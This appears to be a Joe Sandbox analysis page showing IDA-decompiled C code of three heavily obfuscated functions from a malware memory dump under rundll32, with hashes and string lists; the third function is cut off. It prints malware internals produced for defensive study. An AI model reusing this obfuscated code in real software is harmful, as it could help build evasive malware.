Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: J$$$.V$E:hh$Fg"$Mk$N7$Pp$T~N7$U8$]$_$ar-KW
API String ID: 0-2561606393
Opcode ID: 4a32dc434e2758f7309b86c6a0717fc409bb22d78e110ab00c2a0b4807c432b7
Instruction ID: 9d41ea99b59051dd4e04a5beb0f6f74f645293e18a61399abdca71075cdb8705
Opcode Fuzzy Hash: 4a32dc434e2758f7309b86c6a0717fc409bb22d78e110ab00c2a0b4807c432b7
Instruction Fuzzy Hash: 90D100B15087809FE368CF25C58A50BBBE2BBC5708F508A1DF695962A0D7B99909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001A3C28, Relevance: 15.3, Strings: 12, Instructions: 267
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E001A3C28() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				unsigned int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				intOrPtr _t291;
				short* _t293;
				void* _t305;
				signed int _t315;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int* _t353;

				_t353 =  &_v1160;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t305 = 0x2fa583de;
				_v1052 = 0x4c6f5d;
				_v1080 = 0xd680;
				_v1080 = _v1080 >> 8;
				_v1080 = _v1080 ^ 0x000048bc;
				_v1160 = 0x84c6;
				_v1160 = _v1160 | 0x90eaef07;
				_v1160 = _v1160 * 0x61;
				_v1160 = _v1160 << 3;
				_v1160 = _v1160 ^ 0x4826b524;
				_v1056 = 0xc964;
				_t342 = 7;
				_v1056 = _v1056 / _t342;
				_v1056 = _v1056 ^ 0x00007207;
				_v1148 = 0x6aa5;
				_t343 = 0x42;
				_v1148 = _v1148 / _t343;
				_t344 = 0x39;
				_v1148 = _v1148 * 5;
				_v1148 = _v1148 / _t344;
				_v1148 = _v1148 ^ 0x00004be4;
				_v1156 = 0x8b63;
				_v1156 = _v1156 ^ 0xf94e8c04;
				_v1156 = _v1156 + 0xb2a1;
				_t345 = 0x43;
				_v1156 = _v1156 / _t345;
				_v1156 = _v1156 ^ 0x03b8f6e0;
				_v1072 = 0x3b6c;
				_v1072 = _v1072 << 0xd;
				_v1072 = _v1072 ^ 0x076db108;
				_v1104 = 0xc3a0;
				_v1104 = _v1104 << 9;
				_v1104 = _v1104 + 0xffff2888;
				_v1104 = _v1104 ^ 0x01862409;
				_v1112 = 0xaed9;
				_v1112 = _v1112 >> 0x10;
				_v1112 = _v1112 << 0xe;
				_v1112 = _v1112 ^ 0x00000f0a;
				_v1128 = 0xabfc;
				_v1128 = _v1128 ^ 0x77a0f64e;
				_v1128 = _v1128 ^ 0x112f7c48;
				_v1128 = _v1128 ^ 0x668f1451;
				_v1064 = 0x4ad0;
				_v1064 = _v1064 >> 0xf;
				_v1064 = _v1064 ^ 0x00005776;
				_v1060 = 0x5f20;
				_v1060 = _v1060 * 0x48;
				_v1060 = _v1060 ^ 0x001aff44;
				_v1140 = 0x22e9;
				_v1140 = _v1140 | 0xed7bddfb;
				_v1140 = _v1140 >> 0x10;
				_v1140 = _v1140 ^ 0x0000a44c;
				_v1092 = 0xed0e;
				_v1092 = _v1092 >> 5;
				_t346 = 0x5c;
				_v1092 = _v1092 / _t346;
				_v1092 = _v1092 ^ 0x000018a1;
				_v1084 = 0x5c62;
				_v1084 = _v1084 ^ 0xaf876960;
				_v1084 = _v1084 ^ 0xaf8726c8;
				_v1120 = 0xa6b7;
				_v1120 = _v1120 + 0xffff8087;
				_v1120 = _v1120 + 0xffff766a;
				_v1120 = _v1120 ^ 0xffff8dde;
				_v1100 = 0x2977;
				_v1100 = _v1100 | 0xa9a2f948;
				_v1100 = _v1100 << 0xd;
				_v1100 = _v1100 ^ 0x5f2fb900;
				_v1116 = 0x7357;
				_v1116 = _v1116 << 0xc;
				_v1116 = _v1116 + 0x6bcf;
				_v1116 = _v1116 ^ 0x0735f991;
				_v1152 = 0xa9ed;
				_t347 = 0x6b;
				_v1152 = _v1152 / _t347;
				_v1152 = _v1152 + 0xffffb059;
				_v1152 = _v1152 | 0xa1b7dbd9;
				_v1152 = _v1152 ^ 0xffffb8a8;
				_v1144 = 0x5a0d;
				_t348 = 0x7b;
				_v1144 = _v1144 / _t348;
				_t349 = 0x2e;
				_v1144 = _v1144 * 3;
				_v1144 = _v1144 / _t349;
				_v1144 = _v1144 ^ 0x00004b37;
				_v1124 = 0x61f5;
				_v1124 = _v1124 + 0xffffcaee;
				_t350 = 0x53;
				_v1124 = _v1124 * 0x74;
				_v1124 = _v1124 ^ 0x00146ed3;
				_v1108 = 0x6a03;
				_v1108 = _v1108 ^ 0xf28a1003;
				_v1108 = _v1108 + 0xe6b2;
				_v1108 = _v1108 ^ 0xf28b78cf;
				_v1136 = 0xc6e0;
				_v1136 = _v1136 ^ 0xb548e6e2;
				_v1136 = _v1136 / _t350;
				_v1136 = _v1136 + 0x2437;
				_v1136 = _v1136 ^ 0x022f5ba0;
				_v1132 = 0xc215;
				_v1132 = _v1132 + 0x3648;
				_v1132 = _v1132 ^ 0x395806f5;
				_v1132 = _v1132 + 0xffff2e7e;
				_v1132 = _v1132 ^ 0x39586c8a;
				_v1096 = 0x96d1;
				_v1096 = _v1096 | 0xdf771839;
				_v1096 = _v1096 + 0x87a2;
				_v1096 = _v1096 ^ 0xdf78572f;
				_v1076 = 0xe1cc;
				_v1076 = _v1076 | 0xe0a4b35b;
				_v1076 = _v1076 ^ 0xe0a4d0d1;
				_v1088 = 0xf12a;
				_v1088 = _v1088 ^ 0x547c61b2;
				_v1088 = _v1088 | 0x30c978fa;
				_v1088 = _v1088 ^ 0x74fdde11;
				_v1068 = 0xde6c;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00037865;
				do {
					while(_t305 != 0x42239bc) {
						if(_t305 == 0x127033fd) {
							_push(_v1156);
							_push(_v1148);
							E001AEC82(__eflags, E001A5EBA(_v1056, 0x1001f800, __eflags), _v1072, _v1104, _v1112, _v1128,  *0x10020724 + 0x238,  &_v520);
							E001AED35(_v1064, _t285, _v1060, _v1140);
							_t353 =  &(_t353[0xb]);
							_t305 = 0x39c7aaf2;
							continue;
						}
						if(_t305 == 0x2d6c3e18) {
							E001AA7A2();
							_t305 = 0x127033fd;
							continue;
						}
						if(_t305 == 0x2fa583de) {
							_t291 =  *0x10020724;
							__eflags =  *((intOrPtr*)(_t291 + 0x218));
							_t305 =  !=  ? 0x42239bc : 0x2d6c3e18;
							continue;
						}
						if(_t305 == 0x322c5ea9) {
							_t293 = E001B1489(_v1132, _v1096, _v1076,  &_v520);
							__eflags = 0;
							 *_t293 = 0;
							return E001A4CF0(_v1088,  &_v520);
						}
						_t361 = _t305 - 0x39c7aaf2;
						if(_t305 != 0x39c7aaf2) {
							goto L12;
						}
						_push(_t305);
						_t315 = _v1092;
						E001A231A(_t315,  &_v1040, _v1084, _v1120);
						_push(_t315);
						E001B8E31(_t315,  &_v1040,  &_v1040);
						_t291 = E001B473C( &_v520, _v1124, _t361, _v1108, _v1136,  &_v1040);
						_t353 =  &(_t353[9]);
						_t305 = 0x322c5ea9;
					}
					E001B4B48();
					_t305 = 0x127033fd;
					L12:
					__eflags = _t305 - 0xf4f8fd8;
				} while (__eflags != 0);
				return _t291;
			}

0x001a3c28
0x001a3c2e
0x001a3c35
0x001a3c3a
0x001a3c3f
0x001a3c47
0x001a3c4f
0x001a3c54
0x001a3c5c
0x001a3c63
0x001a3c72
0x001a3c76
0x001a3c7b
0x001a3c83
0x001a3c91
0x001a3c96
0x001a3c9c
0x001a3ca4
0x001a3cb0
0x001a3cb5
0x001a3cc0
0x001a3cc3
0x001a3ccf
0x001a3cd3
0x001a3cdb
0x001a3ce3
0x001a3ceb
0x001a3cf7
0x001a3cfa
0x001a3cfe
0x001a3d06
0x001a3d0e
0x001a3d13
0x001a3d1b
0x001a3d23
0x001a3d28
0x001a3d30
0x001a3d38
0x001a3d40
0x001a3d45
0x001a3d4a
0x001a3d52
0x001a3d5a
0x001a3d62
0x001a3d6a
0x001a3d72
0x001a3d7a
0x001a3d7f
0x001a3d87
0x001a3d94
0x001a3d98
0x001a3da0
0x001a3da8
0x001a3db0
0x001a3db5
0x001a3dbd
0x001a3dc5
0x001a3dd2
0x001a3dd7
0x001a3ddd
0x001a3de5
0x001a3ded
0x001a3df5
0x001a3dfd
0x001a3e05
0x001a3e0d
0x001a3e15
0x001a3e1d
0x001a3e25
0x001a3e2d
0x001a3e32
0x001a3e3a
0x001a3e42
0x001a3e47
0x001a3e4f
0x001a3e57
0x001a3e63
0x001a3e68
0x001a3e6e
0x001a3e76
0x001a3e7e
0x001a3e86
0x001a3e92
0x001a3e97
0x001a3ea2
0x001a3ea5
0x001a3eb1
0x001a3eb5
0x001a3ebd
0x001a3ec5
0x001a3ed2
0x001a3ed3
0x001a3ed7
0x001a3edf
0x001a3ee7
0x001a3eef
0x001a3ef7
0x001a3eff
0x001a3f07
0x001a3f15
0x001a3f19
0x001a3f21
0x001a3f29
0x001a3f31
0x001a3f39
0x001a3f41
0x001a3f49
0x001a3f51
0x001a3f59
0x001a3f61
0x001a3f69
0x001a3f71
0x001a3f79
0x001a3f81
0x001a3f89
0x001a3f91
0x001a3f99
0x001a3fa1
0x001a3fa9
0x001a3fb6
0x001a3fc0
0x001a3fcd
0x001a3fcd
0x001a3fd7
0x001a4090
0x001a4099
0x001a40da
0x001a40f3
0x001a40f8
0x001a40fb
0x00000000
0x001a40fb
0x001a3fdf
0x001a4084
0x001a4089
0x00000000
0x001a4089
0x001a3feb
0x001a406a
0x001a4071
0x001a4078
0x00000000
0x001a4078
0x001a3ff3
0x001a4132
0x001a413b
0x001a413d
0x00000000
0x001a4151
0x001a3ff9
0x001a3fff
0x00000000
0x00000000
0x001a4005
0x001a4015
0x001a4019
0x001a402e
0x001a4038
0x001a4058
0x001a405d
0x001a4060
0x001a4060
0x001a4109
0x001a410e
0x001a4110
0x001a4110
0x001a4110
0x00000000

Strings

7$, xrefs: 001A3F19
_, xrefs: 001A3D87
ar-KW, xrefs: 001A406A, 001A40A9, 001A40BF, 001A40D3
b\, xrefs: 001A3DE5
K, xrefs: 001A3CD3
7K, xrefs: 001A3EB5
vW, xrefs: 001A3D7F
]oL, xrefs: 001A3C3F
Ws, xrefs: 001A3E3A
H6, xrefs: 001A3F31
w), xrefs: 001A3E1D
l;, xrefs: 001A3D06

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: _$7$$7K$H6$Ws$]oL$ar-KW$b\$l;$vW$w)$K
API String ID: 0-624185528
Opcode ID: b76aa84886d29439e0a3c957843094effcc20aefc6fffc49b088cdeadd104217
Instruction ID: 47188bf2a0f71d46d059f2b181ba708037190aa2da9c9868373126dcd61aa04c
Opcode Fuzzy Hash: b76aa84886d29439e0a3c957843094effcc20aefc6fffc49b088cdeadd104217
Instruction Fuzzy Hash: 6ED130715083808FE358CF61C58A95BFBE1FBC5758F108A1DF19A962A0C7B98A49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 001ABCA5, Relevance: 14.1, Strings: 11, Instructions: 369
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E001ABCA5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				intOrPtr _v1588;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				void* _t364;
				signed int _t393;
				signed int _t396;
				void* _t397;
				signed int _t401;
				void* _t408;
				void* _t414;
				void* _t449;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				void* _t473;
				void* _t474;
				void* _t475;

				_push(_a20);
				_t473 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t364);
				_v1700 = 0xef65;
				_t475 = _t474 + 0x1c;
				_v1700 = _v1700 >> 4;
				_t408 = 0x2fbc69ba;
				_t460 = 7;
				_v1700 = _v1700 / _t460;
				_v1700 = _v1700 ^ 0x00000233;
				_v1736 = 0x77c0;
				_v1736 = _v1736 + 0x296d;
				_v1736 = _v1736 >> 0xb;
				_v1736 = _v1736 ^ 0x00006588;
				_v1696 = 0xa42e;
				_v1696 = _v1696 << 9;
				_v1696 = _v1696 + 0xd510;
				_v1696 = _v1696 ^ 0x01497cd0;
				_v1668 = 0x825e;
				_v1668 = _v1668 ^ 0x5a1cdfcc;
				_v1668 = _v1668 ^ 0x6191fffa;
				_v1668 = _v1668 ^ 0x3b8d9985;
				_v1680 = 0x873e;
				_v1680 = _v1680 >> 0xf;
				_t461 = 0x5d;
				_v1680 = _v1680 * 0x23;
				_v1680 = _v1680 ^ 0x00000451;
				_v1772 = 0x9b84;
				_v1772 = _v1772 << 0xb;
				_v1772 = _v1772 | 0x19caaf5c;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0xbd5e9b44;
				_v1776 = 0x14a2;
				_v1776 = _v1776 >> 0xd;
				_v1776 = _v1776 >> 2;
				_v1776 = _v1776 + 0x1851;
				_v1776 = _v1776 ^ 0x000003d5;
				_v1760 = 0x9d48;
				_v1760 = _v1760 | 0xf4835317;
				_v1760 = _v1760 / _t461;
				_v1760 = _v1760 + 0xadfb;
				_v1760 = _v1760 ^ 0x02a1926d;
				_v1764 = 0xd024;
				_v1764 = _v1764 ^ 0x75bfba49;
				_t462 = 0x2c;
				_v1764 = _v1764 / _t462;
				_v1764 = _v1764 << 3;
				_v1764 = _v1764 ^ 0x1568fb68;
				_v1640 = 0xd095;
				_v1640 = _v1640 + 0x68a6;
				_v1640 = _v1640 ^ 0x00011e87;
				_v1644 = 0x4d25;
				_v1644 = _v1644 ^ 0xfa3c872a;
				_v1644 = _v1644 ^ 0xfa3cf0fd;
				_v1756 = 0x7142;
				_v1756 = _v1756 ^ 0x41f2ce3c;
				_v1756 = _v1756 + 0x589a;
				_v1756 = _v1756 + 0xef55;
				_v1756 = _v1756 ^ 0x41f454e3;
				_v1672 = 0xcd80;
				_v1672 = _v1672 >> 0xe;
				_v1672 = _v1672 >> 6;
				_v1672 = _v1672 ^ 0x000004be;
				_v1656 = 0xa5e2;
				_v1656 = _v1656 >> 0xf;
				_v1656 = _v1656 ^ 0x00005d10;
				_v1688 = 0x4307;
				_v1688 = _v1688 ^ 0xf8e571c9;
				_v1688 = _v1688 + 0xffff617c;
				_v1688 = _v1688 ^ 0xf8e4e5a7;
				_v1744 = 0x4358;
				_v1744 = _v1744 ^ 0x6a39e931;
				_v1744 = _v1744 << 0xa;
				_t463 = 0x71;
				_v1744 = _v1744 / _t463;
				_v1744 = _v1744 ^ 0x020af85a;
				_v1660 = 0xcade;
				_t464 = 0x4f;
				_v1660 = _v1660 / _t464;
				_v1660 = _v1660 ^ 0x0000062a;
				_v1692 = 0xab9b;
				_t465 = 0x21;
				_v1692 = _v1692 / _t465;
				_v1692 = _v1692 << 8;
				_v1692 = _v1692 ^ 0x000556b2;
				_v1648 = 0xb997;
				_v1648 = _v1648 | 0xf4544387;
				_v1648 = _v1648 ^ 0xf45494f1;
				_v1716 = 0x788f;
				_v1716 = _v1716 ^ 0x250ce2aa;
				_t466 = 0x64;
				_v1716 = _v1716 / _t466;
				_v1716 = _v1716 ^ 0x005ea635;
				_v1684 = 0xf0c4;
				_v1684 = _v1684 << 0xc;
				_v1684 = _v1684 | 0x733f2c5b;
				_v1684 = _v1684 ^ 0x7f3f289c;
				_v1724 = 0xfc6c;
				_v1724 = _v1724 ^ 0x3591892a;
				_v1724 = _v1724 + 0xcfb2;
				_v1724 = _v1724 ^ 0x35926297;
				_v1676 = 0x5703;
				_v1676 = _v1676 << 2;
				_v1676 = _v1676 << 2;
				_v1676 = _v1676 ^ 0x00050027;
				_v1752 = 0x36a9;
				_v1752 = _v1752 << 0xe;
				_v1752 = _v1752 ^ 0x911815de;
				_v1752 = _v1752 + 0x3dd8;
				_v1752 = _v1752 ^ 0x9cb2ba8a;
				_v1768 = 0x4d15;
				_v1768 = _v1768 | 0xf01c2bfc;
				_v1768 = _v1768 << 0xd;
				_v1768 = _v1768 >> 0x10;
				_v1768 = _v1768 ^ 0x0000a243;
				_v1636 = 0x385c;
				_t467 = 0x1a;
				_v1636 = _v1636 / _t467;
				_v1636 = _v1636 ^ 0x00000be7;
				_v1652 = 0xf48c;
				_v1652 = _v1652 << 0x10;
				_v1652 = _v1652 ^ 0xf48c2628;
				_v1708 = 0x6e63;
				_v1708 = _v1708 << 8;
				_v1708 = _v1708 >> 6;
				_v1708 = _v1708 ^ 0x00019599;
				_v1732 = 0x3e21;
				_t468 = 0x44;
				_v1732 = _v1732 * 0x47;
				_v1732 = _v1732 * 0x5f;
				_v1732 = _v1732 ^ 0x0664acef;
				_v1664 = 0x2bc6;
				_v1664 = _v1664 + 0xffff4312;
				_v1664 = _v1664 ^ 0xffff783b;
				_v1704 = 0x50a2;
				_v1704 = _v1704 + 0x2dd2;
				_t459 = _v1664;
				_v1704 = _v1704 / _t468;
				_v1704 = _v1704 ^ 0x00002a3e;
				_v1748 = 0x901a;
				_v1748 = _v1748 << 4;
				_v1748 = _v1748 + 0x4210;
				_t469 = 0x39;
				_v1748 = _v1748 / _t469;
				_v1748 = _v1748 ^ 0x00007ac2;
				_v1712 = 0x29ba;
				_v1712 = _v1712 >> 3;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 ^ 0x00a6b995;
				_v1720 = 0x8b08;
				_v1720 = _v1720 + 0xffffb6f4;
				_t470 = 6;
				_v1720 = _v1720 / _t470;
				_v1720 = _v1720 ^ 0x00001229;
				_v1740 = 0xbc9a;
				_v1740 = _v1740 >> 0xa;
				_v1740 = _v1740 * 0x3c;
				_v1740 = _v1740 + 0x7392;
				_v1740 = _v1740 ^ 0x0000345c;
				_v1728 = 0x7114;
				_v1728 = _v1728 + 0xffff466c;
				_v1728 = _v1728 ^ 0x33c8a084;
				_v1728 = _v1728 ^ 0xcc377c5e;
				while(1) {
					_t449 = 0x2e;
					L2:
					while(_t408 != 0x25e1cef) {
						if(_t408 == 0x83edf3b) {
							return E001B79D2(_v1712, _t459, _v1720, _v1740, _v1728);
						}
						if(_t408 == 0x9602f07) {
							_t396 = E001B69F0( &_v520, _v1672, _v1656, _v1688,  &_v1632);
							_t459 = _t396;
							_t475 = _t475 + 0x10;
							__eflags = _t396 - 0xffffffff;
							if(__eflags == 0) {
								return _t396;
							}
							_t408 = 0x2135cd7a;
							while(1) {
								_t449 = 0x2e;
								goto L2;
							}
						}
						if(_t408 == 0x12f90048) {
							_push(_v1668);
							_push(_v1696);
							_t397 = E001A5EBA(_v1736, 0x1001f980, __eflags);
							_pop(_t414);
							E001A56BE(_v1680, __eflags, _t414, _t397, _v1772, _v1776, _v1760,  &_v520);
							E001AED35(_v1764, _t397, _v1640, _v1644);
							_t475 = _t475 + 0x20;
							_t408 = 0x9602f07;
							while(1) {
								_t449 = 0x2e;
								goto L2;
							}
						}
						if(_t408 == 0x2135cd7a) {
							_t401 = _v1700;
							__eflags = _v1632 & _t401;
							if(__eflags == 0) {
								_t401 = _a12( &_v1632, _a16);
								asm("sbb ecx, ecx");
								_t408 = ( ~_t401 & 0xfa1f3db4) + 0x83edf3b;
								while(1) {
									_t449 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t449;
							if(_v1588 != _t449) {
								L15:
								__eflags = _a20;
								if(__eflags != 0) {
									_push(_v1692);
									_push(_v1660);
									E001AEC82(__eflags, E001A5EBA(_v1744, 0x1001f9b0, __eflags), _v1648, _v1716, _v1684, _v1724, _t473,  &_v1040);
									E001ABCA5(_v1676,  &_v1040, _v1752, _v1768, _a12, _a16, _a20);
									_t475 = _t475 + 0x38;
									_t401 = E001AED35(_v1636, _t403, _v1652, _v1708);
									_t449 = 0x2e;
								}
								L14:
								_t408 = 0x25e1cef;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L14;
							}
							__eflags = _v1586 - _t449;
							if(_v1586 != _t449) {
								goto L15;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L15;
							}
							goto L14;
						}
						if(_t408 != 0x2fbc69ba) {
							L24:
							__eflags = _t408 - 0x16777166;
							if(__eflags != 0) {
								continue;
							}
							return _t401;
						}
						_t408 = 0x12f90048;
					}
					_t393 = E001AC8DC(_v1732, _v1664, _v1704, _v1748, _t459,  &_v1632);
					_t475 = _t475 + 0x10;
					__eflags = _t393;
					if(__eflags != 0) {
						_t408 = 0x2135cd7a;
						_t449 = 0x2e;
						goto L24;
					}
					_t408 = 0x83edf3b;
				}
			}

0x001abcae
0x001abcb5
0x001abcb7
0x001abcbe
0x001abcc5
0x001abccc
0x001abcd3
0x001abcd4
0x001abcd5
0x001abcda
0x001abce2
0x001abce5
0x001abcf0
0x001abcf7
0x001abcfc
0x001abd02
0x001abd0a
0x001abd12
0x001abd1a
0x001abd1f
0x001abd27
0x001abd2f
0x001abd34
0x001abd3c
0x001abd44
0x001abd4f
0x001abd5a
0x001abd65
0x001abd70
0x001abd78
0x001abd82
0x001abd85
0x001abd89
0x001abd91
0x001abd99
0x001abd9e
0x001abda6
0x001abdab
0x001abdb3
0x001abdbb
0x001abdc0
0x001abdc5
0x001abdcd
0x001abdd5
0x001abddd
0x001abded
0x001abdf1
0x001abdf9
0x001abe01
0x001abe09
0x001abe15
0x001abe18
0x001abe1c
0x001abe21
0x001abe29
0x001abe34
0x001abe3f
0x001abe4a
0x001abe55
0x001abe60
0x001abe6b
0x001abe73
0x001abe7b
0x001abe83
0x001abe8b
0x001abe93
0x001abe9d
0x001abea2
0x001abea7
0x001abeaf
0x001abeba
0x001abec2
0x001abecd
0x001abed5
0x001abedd
0x001abee5
0x001abeed
0x001abef5
0x001abefd
0x001abf08
0x001abf0d
0x001abf13
0x001abf1b
0x001abf2d
0x001abf32
0x001abf3b
0x001abf46
0x001abf52
0x001abf57
0x001abf5d
0x001abf62
0x001abf6a
0x001abf75
0x001abf80
0x001abf8b
0x001abf93
0x001abf9f
0x001abfa4
0x001abfaa
0x001abfb2
0x001abfba
0x001abfbf
0x001abfc7
0x001abfcf
0x001abfd7
0x001abfdf
0x001abfe7
0x001abfef
0x001abff7
0x001abffc
0x001ac001
0x001ac009
0x001ac011
0x001ac016
0x001ac01e
0x001ac026
0x001ac02e
0x001ac036
0x001ac03e
0x001ac043
0x001ac048
0x001ac050
0x001ac062
0x001ac065
0x001ac06c
0x001ac077
0x001ac082
0x001ac08c
0x001ac097
0x001ac09f
0x001ac0a4
0x001ac0a9
0x001ac0b1
0x001ac0c0
0x001ac0c3
0x001ac0cc
0x001ac0d0
0x001ac0d8
0x001ac0e3
0x001ac0ee
0x001ac0f9
0x001ac101
0x001ac111
0x001ac118
0x001ac11c
0x001ac124
0x001ac12c
0x001ac131
0x001ac13d
0x001ac142
0x001ac148
0x001ac150
0x001ac158
0x001ac15d
0x001ac162
0x001ac16a
0x001ac172
0x001ac17e
0x001ac181
0x001ac185
0x001ac18d
0x001ac195
0x001ac19f
0x001ac1a3
0x001ac1ab
0x001ac1b3
0x001ac1bb
0x001ac1c3
0x001ac1cb
0x001ac1d3
0x001ac1d5
0x00000000
0x001ac1d6
0x001ac1e8
0x00000000
0x001ac43e
0x001ac1f4
0x001ac3c6
0x001ac3cb
0x001ac3cd
0x001ac3d0
0x001ac3d3
0x001ac44a
0x001ac44a
0x001ac3d5
0x001ac1d3
0x001ac1d5
0x00000000
0x001ac1d5
0x001ac1d3
0x001ac200
0x001ac33d
0x001ac346
0x001ac34e
0x001ac354
0x001ac376
0x001ac38f
0x001ac394
0x001ac397
0x001ac1d3
0x001ac1d5
0x00000000
0x001ac1d5
0x001ac1d3
0x001ac20c
0x001ac221
0x001ac225
0x001ac22c
0x001ac31f
0x001ac32a
0x001ac332
0x001ac1d3
0x001ac1d5
0x00000000
0x001ac1d5
0x001ac1d3
0x001ac232
0x001ac23a
0x001ac266
0x001ac266
0x001ac26e
0x001ac270
0x001ac279
0x001ac2b2
0x001ac2e5
0x001ac2ea
0x001ac301
0x001ac30a
0x001ac30a
0x001ac25c
0x001ac25c
0x00000000
0x001ac25c
0x001ac23c
0x001ac245
0x00000000
0x00000000
0x001ac247
0x001ac24f
0x00000000
0x00000000
0x001ac251
0x001ac25a
0x00000000
0x00000000
0x00000000
0x001ac25a
0x001ac214
0x001ac419
0x001ac419
0x001ac41f
0x00000000
0x00000000
0x00000000
0x001ac41f
0x001ac21a
0x001ac21a
0x001ac3fb
0x001ac400
0x001ac403
0x001ac405
0x001ac413
0x001ac418
0x00000000
0x001ac418
0x001ac407
0x001ac407

Strings

[,?s, xrefs: 001ABFBF
>*, xrefs: 001AC11C
\4, xrefs: 001AC1AB
e, xrefs: 001ABCDA
%M, xrefs: 001ABE4A
', xrefs: 001AC001
U, xrefs: 001ABE83
cn, xrefs: 001AC097
\8, xrefs: 001AC050
19j, xrefs: 001ABEF5
!>, xrefs: 001AC0B1

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !>$%M$'$19j$>*$U$[,?s$\4$\8$cn$e
API String ID: 0-760149550
Opcode ID: 9299ef8955ee6ace36b645545cced30e4a02fa01e40505068dc7fd544233c0e6
Instruction ID: a7535012d650b402151f4d780ecde6ef61d3b9c49f15e5fa3a7227a71be44051
Opcode Fuzzy Hash: 9299ef8955ee6ace36b645545cced30e4a02fa01e40505068dc7fd544233c0e6
Instruction Fuzzy Hash: 880245715083809FE369CF65C549A9FBBE1FBC5708F10891DF299862A0D7B98949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001A1B46, Relevance: 14.1, Strings: 11, Instructions: 355
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001A1B46(intOrPtr __ecx, intOrPtr* __edx, char _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t406;
				intOrPtr _t412;
				short* _t415;
				signed int _t416;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				short _t470;
				void* _t471;
				intOrPtr* _t473;
				signed int* _t474;

				_t474 =  &_v1216;
				_v1052 = 0x61e0b9;
				_t473 = __edx;
				_v1056 = __ecx;
				_t470 = 0;
				_v1048 = _v1048 & 0;
				_t471 = 0x2e8890c5;
				_v1044 = _v1044 & 0;
